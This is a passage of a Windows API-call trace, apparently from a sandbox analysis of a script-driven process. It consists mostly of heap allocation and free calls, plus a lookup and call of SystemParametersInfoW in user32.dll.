Size=0x4) returned 0x2e54ca8 [0285.196] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0285.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0285.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0285.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0285.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0285.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0285.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0285.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0285.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0285.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0285.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0285.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0285.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0285.198] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0285.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0285.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0285.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0285.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0285.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0285.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0285.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0285.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0285.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0285.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0285.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0285.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0285.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0285.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0285.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0285.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0285.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0285.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0285.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0285.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0285.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0285.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0285.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0285.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0285.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0285.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0285.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0285.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0285.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0285.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0285.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0285.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0285.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0285.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0285.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0285.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0285.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0285.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0285.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0285.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0285.203] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0285.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0285.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0285.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0285.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69a08 [0285.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69a08, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0285.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0285.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0285.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0285.204] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0285.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0285.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0285.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0285.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0285.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0285.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0285.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0285.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0285.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0285.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0285.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0285.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0285.205] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0285.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0285.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0285.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0285.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0285.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0285.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0285.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0285.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0285.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0285.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0285.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0285.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0285.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0285.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0285.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0285.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0285.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0285.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0285.309] FreeLibrary (hLibModule=0x750c0000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0285.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0285.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0285.310] HeapFree (in: 